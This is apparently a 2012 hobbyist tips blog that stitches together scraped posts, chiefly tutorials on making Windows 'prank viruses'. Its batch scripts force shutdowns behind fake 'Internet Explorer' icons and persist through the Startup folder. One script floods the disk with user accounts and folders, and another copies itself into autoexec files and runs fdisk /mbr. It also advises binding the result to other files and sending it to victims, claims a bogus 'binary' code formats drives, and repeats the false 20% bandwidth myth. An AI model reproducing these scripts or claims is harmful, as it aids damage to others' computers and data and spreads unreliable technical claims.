Friday, 27 April 2012

How to Create a Fake and Harmless Virus

How to Create a Fake and Harmless Virus

Edited by Guna mcj.
Do you want to play a trick on your friends? This shocking but harmless virus is the best choice to use. Read on to find out how to execute it.

Edit Steps


Building the Virus

  1. 1
    Run \WINDOWS\notepad.exe . Do this by clicking Start>All Programs>Accessories>Notepad. You can also enter "notepad" in the "Run" dialog. You would do this by going to %HomePath%\Start Menu\Programs\Startup\. This will automatically run the script when the user logs in.
  2. 2
    Select to Save as type: keys.
  3. 3
    Copy and paste the batch script of the "virus" into the open notepad.
  4. 4
    Click the "File>Save As" menu item to save the script.
  5. 5
    Select a location to save the Files.
  6. 6
    Be creative with the file name. Replace the ".txt'" extension with ".bat" or ".cmd". The language will be interpreted upon clicking.
  7. 7
    Click "Save" and close the notepad.
    • If you saved to the Startup folder, you will have to boot into Safe mode and manually remove the script.
    • If you are not an admin, you will not be able to save the file to another user on your own PC.

Making a Fake Icon

  1. 1
    Right click on the desktop and go over to "New," then click "Short cut".
  2. 2
    For the location of the short cut choose your virus. Click "Next."
  3. 3
    Give the shortcut a name that your victim will click on. Click on "Finish".
  4. 4
    Right click on the shortcut you have just made and choose "Properties." Click on the "Choose icon" button and scroll through the list of icons.
  5. 5
    Choose an icon that fits well to the name. Click on it and hit "OK" twice.
    • This will not work on Windows 7 Pro

Alternate Method For Creating a Virus

  1. 1
    Open up a notepad document (Windows only).
  2. 2
    Type this code in:
    @echo off
    echo hahahaha im hacking ur computer
    DIR /s
    shutdown.exe
  3. 3
    Save the document with an original name and add ".bat" at the end.
  4. 4
    Make sure that the "*.txt bar" is changed to "All Files".
  5. 5
    Make a shortcut to the virus on the desktop or somewhere else that is not suspicious. Rename the shortcut so the extension is there, (example: make "Play an awesome game for free.bat" to "Play an Awesome game for free").
  6. 6
    Change the icon. Go to the properties for the shortcut, then check both tabs for a button saying: "Change Icon". Choose from the list and click "Apply."
    • Sometimes an error will come up if it does then just click "OK."
  7. 7
    Now, when somebody clicks on it, a bunch of coding will come up with a message saying "hahahahaha im hacking ur computer". The computer will then be shut down.



Edit Tips

  • Alternatively, set your 'virus' to execute every time a user logs in. Navigate to Start > All Programs > Startup (Right-click) > Open and copy the shortcut into the folder that opens. Be careful with the shutdown timer's value. Too short of an interval will make it easy for even the most computer illiterate people to deactivate the virus.

    Notes:
  • A safe mode boot will halt the Startup and the Registry Run key.
    If you really screwed up, boot a Live Linux distro and mount the hard drive. Once mounted, navigate to that directory and delete the file.


  • Running batch files like these in full screen can make them even scarier and more convincing. Right click on the icon and chose properties -> options -> full screen. Do not shutdown the computer too early. It may not scare the victim or may not look like a virus.
  • It's even better if you name the virus "Internet Explorer" and change the icon to match. Save it to your desktop and delete the old internet shortcut so if they click to go on the internet, it shuts down on them.


Edit Warnings

  • Once this virus has been clicked on, there is often no way to stop it.
  • Only do this to someone who can handle such a prank!
  • Do not execute such viruses on computers that must be available 24 hours a day, such as the ones in hospitals.
  • If you use a shutdown-countdown, you should have enough time to abort the countdown.

How to make a prank shutdown virus

How to make a prank shutdown virus

By Guna mcj.

Ever wonder what new prank you could come up with to make your little sister go crazy? Here's a simple, yet very effective one. Just switch one of your desktop icons (i.e. Internet Explorer) with a fake one and a warning box will pop-up which will shut down your computer within 30 seconds. Isn't that enough to make lil' sister yell when she sees her Barbie doll game go bye-bye? Here's how it works:

This isn't really a virus ... its simply a shutdown program which will make your friends freak out.

First, you will need to create a shortcut. You can create a shortcut by right-clicking on your desktop and selecting New, and then, Shortcut.

A Create Shortcut box should then open. In that box, write the following:

shutdown -s -t 30 -c "VIRUS DETECTED!!"

(note: the number 30 can be replaced by any other number. That number corresponds to the number of seconds before the computer will shutdown. Here I have chosen 30 in order to have enough time to close it before my computer shuts down. Also, the message between quotes can be replaced by something like "YOU HAVE BEEN INFECTED BY A TROJAN VIRUS" or some other great idea. However, the message must be between quotes.)

After, simply click on Next and a box with the name Shutdown will appear. Change the name that you want for it. In this case I have chosen Internet Explorer but it can always be renamed how you prefer.

After naming it, click on Finish and ... here's your shutdown virus!!!! Not very convincing he? Well, in that case let's change our icon!

Right-click on your shutdown Internet Explorer icon (or whichever name you gave it) and select Properties.

Select Change Icon

(Note: A box saying "system 32 does not have any icons choose from a diffrent list" or something like that may pop-up; if it does simply click on Ok)

Now... it depends on what you have named your shutdown virus ... If you chose Internet Explorer scroll all the way to the right and you will find the icon. If you did not choose Internet Explorer feel free to choose a different icon... Remember it has to be something that people will click on.

Now Heres our Icon ... Now it looks like something that people will click on.

To close the program, select the start menu and click on Run...

Write: Shutdown -a

and the program should shutdown immediately.

(Note: To shut it, you can also do a new shortcut but instead of writing shutdown -s -t 30 -c "VIRUS DETECTED" write this: shutdown -a

and call it Shutdown abort..So instead of closing it with Run you can just click on your shutdown abort shortcut.)

Have fun freaking out your friends/family ... And dont forget to close it or put a longer time frame so that you will have enough time to close it.

WARNING: This program will really shutdown your computer. It may be fun to do it to little sisters or friends but refrain from using it if someone is actually working on the computer, since they will lose all their information.

Enjoy!

create your own virus using note pad

create your own virus using note padThis is a featured page

Hello Friends here am gonna show you how 2 make virus. and virus which formats the hard disk.

😜
<strong>Simple Virus in notepad</strong>
This is a simple virus that formats HDD. Write The Following In Notepad Exactly as it says 01001011000111110010010101010101010000011111100000 Save As An EXE Any Name Will Do
Send the EXE to People And Infect
WARNING: I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS!!!



2nd virus



If you think that notepad is useless then you are wrong because you can
now do a lot of things with a notepad which you could have never
imagined.In this hack I will show you how to make simple .bat file
(virus) that can't be detected by any antivirus

Here are some good viruses ,i am not responsible for any kind of damage
to your system ... :)

* Copy this to notepad and save as flood1.bat.....


@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

wat does it do : this is an extremely harmful virus the will keep
replicating itself until your harddrive is totally full and will destroy
ur comp.


* A simple binary codes that can format the sytem drive ,secondary
drives...

How to create a virus

115Share
Hey Guys I am here With a Small Tutorial On How to create a virus. By using This trick You Can Easily Prank Your Friends
First Of lemme Start With Telling You
What Is A Virus?
A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.(Source Wikipedia)

As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.(Source Wikipedia)
  • Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.
@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do copy c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT
echo echo virus detected! >>c:windowssystem32autoexec.NT
echo pause >>c:windowssystem32autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:autoexec.bat
echo echo system hault-virus identified! >>c:autoexec.bat
echo chkdsk >>c:autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″
Code Details
@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)

Preparing the Virus

  1. Read and understand the warnings!
  2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
  3. Copy and Paste the Code of the “virus” into Notepad
  4. Click File -> Save as
  5. Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!
  6. Change “.txt” to “All files” in the file type drop-down menu
  7. Chose a harmless filename. Replace the “.txt” at the with “.bat”
  8. Click on save and close Notepad.
Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other File
Read-How To Bind Two Files Together?[TUT]
And After Binding The File Then Just Sent This File To Your Friends Then You can Just sit back and enjoy the show!
Hope You Liked My post……..If You Have Any Queries just Comment Here

Creating a new torjan (virus).

New PC virus doesn't just steal your money - it creates fake online bank statements so you even don't know it's gone

  • Crimeware steals passwords from your browser
  • Cyber criminals use your debit card details to drain your account
  • When you visit your bank, it adjusts figures so the criminal transactions don't appear
  • Attack has been used in U.S. and UK


Trojan
The new SpyEye 'trojan horse' software steals your card details - then when you log into your online bank, it adjusts your balance so you don't realise anything is wrong. It's already been found in the U.S. and the UK
A new version of the SpyEye 'trojan horse' software not only steals your money, it then offers false reassurance that it's still there.
When you visit your online bank, there will be no trace of the transactions that cyber-criminals are using to empty your bank account.
Worse, your balance will also be adjusted on screen so it looks as if nothing is happening.
The attack - on Windows PCs - has already been detected in the U.S. and the UK.
The software - which steals your bank passwords to give access to your account - waits for you to enter the same banking details before 'adjusting' what you see.
The idea is that it gives thieves more time to use your debit card details on fraudulent transactions without you realising it's happening.
The first you'll learn of the attack is your bank refusing you money, or a paper statement showing you that cyber criminals have been draining money out of your account.
The new version of SpyEye has targeted banks in the U.S. and the UK.
Trusteer, a security company which detected the attack, says, 'The next time the victim visits their online banking site, the malware hides the fraudulent transactions, as well as artificially changing the total balance.'

 

  • Most photos reported to Facebook as 'offensive' are just unflattering, engineer reveals - and they won't help with that
  • Watch your wall: New Facebook attack has stolen passwords from 45,000 users - and could be spreading through infected links
'As a result, the deceived customer has no idea that their account has been ‘taken over’, nor that any fraudulent transactions have taken place.'
The software, a variant on a commonly used cyber attack, has been 'tweaked' so that as well as its usual attack - grabbing passwords and login information from your web browser without you knowing, it also adjusts your balance when you next visit your bank's web page.
'SpyEye is a tweak of the Zeus crimeware kit that grabs web form data within browsers,' says the Naked Security blog at web security experts Sophos. 'This year, right before the recent holiday season, Trusteer found a hopped-up version of SpyEye attacking banks in the U.S. and U.K.
'The new Trojan, instead of intercepting or diverting email messages, hides bogus transactions even after users have logged out and then logged back into their accounts.'
'This version of SpyEye both hides the fraudulent transaction and masks the amount of the transaction, putting forward a fake balance and ensuring that victims are oblivious to anything being amiss.'
With hi-tech cyber attacks such as SpyEye, there are few visible signs that anything is wrong.
There are defences, though - ensure your browser is up to date, manually updating it if necessary.
You should also ensure that the 'anti-phishing' option is switched to 'on' in Firefox, Chrome or Internet Explorer, which will check for 'blacklisted' websites and prevent your browser being directed to the 'fake' version that delivers your bank statemen

Microsoft reserves 20% of your available bandwidth

     Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc

You can get it back:

Click Start then Run and type "gpedit.msc" without quotes. This opens the group policy editor.

Then go to:
--> Local Computer Policy
--> Computer Configuration
--> Administrative Templates
--> Network
--> QOS Packet Scheduler
--> Limit Reservable Bandwidth.
 
Double click on Limit Reservable bandwidth.
 It will say it is not configured, but the truth is under the 'Explain' tab i.e." By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well. 

Increase PC Performance by Reducing Shared Video RAM

Increase PC Performance by Reducing Shared Video RAM 

I don’t know if it’s just me but I think motherboard manufactures changed the way that they handle integrated video memory. I like to buy a new computer every year. Every year around Black Friday, I buy a system on sale and sell my old one on eBay. I think it’s a pretty good setup. You buy the cutting edge equipment and sell what you have before its features phase out of popularity.Speed Fetish I do this because I have an obsession with performance. I like to make sure my computers work efficiently. Unfortunately, most computers out of the box are not optimized for performance. They are manufactured with the dumb does-not-know-any-better home user in mind. Typical performance-boosting tasks I carry out with every new computer I own include doubling the memory, terminating the system restore “feature,” disabling the swap file, and uninstalling the superfluous, “complimentary,” memory-hogging, thread-wasting programs set up by the computer OEM manufacturer. For those who can empathize with me, I absolutely hate WildTangent.

Marketing Lies

vram_closeap.jpgThe other day I noticed that my new computer was running slower than normal. Suddenly, I saw that ominous bubble saying something like “You are low on memory. Try increasing page file.” “That’s impossible!” I thought. “I have 1 GB of memory!” But when I checked the System applet, it turned out I had 768 MB of memory. I quickly glanced at the features sticker on the front of my tower to verify that I certainly bought a computer with “1GB Blazing-fast DDR2-5300 RAM.” So, what’s the problem?

Sharing Sucks

I discovered that the Intel Integrated Graphics Chipset shares the RAM with my motherboard. What gives? That’s fine that it has to share but does it really need to take that much! In my day, we would run fine on 16 MB of VRAM! If you don’t have any high-end graphics requirements like me, why don’t you go into your BIOS and lower that VRAM reservation to the double digits. Your memory-intensive, multitasking, million-tab Firefox windows will thank you.

vram_bios.jpg

Thursday, 26 April 2012

Remove new folder.exe virus


How to remove new folder.exe virus from pendrive


If you are using pendrive for data transfer at school, college or at your office you must have come across this virus. This virus creates an exe file in your usb drive with the name New Folder.exe. Here are some symptoms of this virus.
  • Task manager is disabled.
  • Registry Editor is disabled.
  • Folder options not working.
  • Taking too much time for accessing pendrive.
  • Uses half of your computers processing power.
You can easily remove this virus from your computer by using Smart Virus Remover tool. It is a small 550 Kb file. Just download the file from the link given at the end of this article. Run this downloaded exe by double clicking on it.Then click on “Delete Autorun.inf file”.

After that click on ” Remove virus from USB”. The virus will be removed from your pendrive. To restore your task manager, registry editor and other things which were disabled by virus – click on “Restore Default Windows Settings”.
remove new folder.exe virus

Download Smart Virus Remover

OR

Download and install combofix

Enjoy

Make your pc speak


Make your pc speak whatever you type[VBS Trick]



Now you can create your own text to speech converter software to make your computer speak whatever you type. I found this script on some Vietnamese site. It’s pretty cool. Just run this script and make it read any funny sentence.Copy the code given below in notepad and save it as anyname.vbs. Make sure that you save it as .vbs file.
Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
After making a vbs file just double click on that file and type anything you want in the textbox.
Speaktome
Enjoy

Password resetting.


How to reset Windows admin password without knowing the old password


Here is a simple tutorial on resetting the admin account password of any Windows Operating System.  All you will require for this is one Ubuntu live CD.
  1. Insert Ubuntu Live CD and boot from it.
  2. Open terminal and install chntpw in Ubuntu. To do so use the following commands.
    sudo apt-get update
    sudo apt-get install chntpw
  3. Now mount your Windows volume. In my case it was dev/sda1. Replace it with yours.
    sudo mkdir /media/WINDOWS
    sudo mount /dev/sda1 /media/WINDOWS
  4. Now navigate to the Windows configuration folder.
    cd /media/WINDOWS/WINDOWS/system32/config/
  5. To reset the administrator password enter
    sudo chntpw SAM
  6. After completing this command you will see 5 different choices. Select the 1st one and press Enter and done.

Put Pictures On Facebook Chat Box


Bellow are the code to put pictures on Facebook Chat Box:

Mr. Bean




 











[[255016264574238]] [[255016271240904]] [[255016277907570]]
[[255016267907571]] [[255016274574237]] [[255016384574226]]
[[255016387907559]] [[255016394574225]] [[255016401240891]]
[[255016391240892]] [[255016464574218]] [[255016454574219]]
[[255016457907552]] [[255016461240885]] [[255016451240886]]
[[255016537907544]] [[255016531240878]] [[255016534574211]]
[[255016541240877]] [[255016527907545]] [[255016634574201]]


Jack Sparrow





 









[[298356520217565]] [[298356516884232]] [[298356506884233]] [[298356510217566]]
[[298356513550899]] [[298356620217555]] [[298356606884223]] [[298356616884222]]
[[298356610217556]] [[298356613550889]] [[298356673550883]] [[298356676884216]]
[[298356666884217]] [[298356680217549]] [[298356670217550]] [[298356740217543]]
[[298356733550877]] [[298356743550876]] [[298356730217544]] [[298356736884210]]
[[298356823550868]] [[298356810217536]] [[298356820217535]] [[298356826884201]]
[[298356813550869]] [[298356906884193]] [[298356896884194]] [[298356900217527]]
[[298356903550860]] [[298356893550861]] [[298356950217522]] [[298356946884189]]


Superman






 







[[299528860107644]] [[299528863440977]] [[299528866774310]] [[299528856774311]]
[[299528870107643]] [[299528950107635]] [[299528943440969]] [[299528946774302]]
[[299528953440968]] [[299528956774301]] [[299529013440962]] [[299529016774295]]
[[299529010107629]] [[299529003440963]] [[299529006774296]] [[299529060107624]]
[[299529063440957]] [[299529066774290]] [[299529070107623]] [[299529073440956]]
[[299529173440946]] [[299529183440945]] [[299529180107612]] [[299529176774279]]
[[299529186774278]] [[299529243440939]] [[299529236774273]] [[299529240107606]]


Emlo




[[302117289844540]] [[302117283177874]] [[302117276511208]] [[302117279844541]] [[302117286511207]] [[302117366511199]]
[[302117369844532]] [[302117373177865]] [[302117383177864]] [[302117379844531]] [[302117426511193]] [[302117436511192]]
[[302117429844526]] [[302117423177860]] [[302117433177859]] [[302117523177850]] [[302117529844516]] [[302117526511183]]
[[302117536511182]] [[302117533177849]] [[302117606511175]] [[302117596511176]] [[302117599844509]] [[302117593177843]]
[[302117603177842]] [[302117646511171]] [[302117649844504]] [[302117659844503]] [[302117656511170]] [[302117653177837]]
[[302117706511165]] [[302117703177832]] [[302117699844499]] [[302117709844498]] [[302117696511166]] [[302117749844494]]


Troll Face






 






[[242538225822042]] [[242538222488709]] [[242538232488708]] [[242538219155376]] [[242538229155375]] [[242538339155364]]
[[242538335822031]] [[242538342488697]] [[242538345822030]] [[242538349155363]] [[242538392488692]] [[242538395822025]]
[[242538399155358]] [[242538402488691]] [[242538405822024]] [[242538475822017]] [[242538472488684]] [[242538489155349]]
[[242538492488682]] [[242538485822016]] [[242538562488675]] [[242538565822008]] [[242538569155341]] [[242538575822007]]
[[242538572488674]] [[242538612488670]] [[242538625822002]] [[242538619155336]] [[242538622488669]] [[242538615822003]]
[[242538675821997]] [[242538682488663]] [[242538672488664]] [[242538679155330]] [[242538685821996]] [[242538742488657]]


Mask





 







[[255006724575192]] [[255006727908525]] [[255006737908524]] [[255006734575191]] [[255006731241858]]
[[255006827908515]] [[255006831241848]] [[255006824575182]] [[255006817908516]] [[255006821241849]]
[[255006874575177]] [[255006871241844]] [[255006884575176]] [[255006877908510]] [[255006881241843]]
[[255006934575171]] [[255006931241838]] [[255006941241837]] [[255006944575170]] [[255006937908504]]
[[255007004575164]] [[255007001241831]] [[255006994575165]] [[255006997908498]] [[255006991241832]]
[[255007084575156]] [[255007101241821]] [[255007077908490]] [[255007091241822]] [[255007081241823]]


Heart






 





[[379320338758329]] [[379320355424994]] [[379320348758328]] [[379320352091661]] [[379320345424995]] [[379320455424984]]
[[379320448758318]] [[379320452091651]] [[379320445424985]] [[379320442091652]] [[379320525424977]] [[379320518758311]]
[[379320512091645]] [[379320522091644]] [[379320515424978]] [[379320602091636]] [[379320612091635]] [[379320605424969]]
[[379320598758303]] [[379320608758302]] [[379320702091626]] [[379320705424959]] [[379320692091627]] [[379320695424960]]
[[379320698758293]] [[379320778758285]] [[379320775424952]] [[379320788758284]] [[379320785424951]] [[379320782091618]]
[[379320872091609]] [[379320875424942]] [[379320865424943]] [[379320862091610]] [[379320868758276]]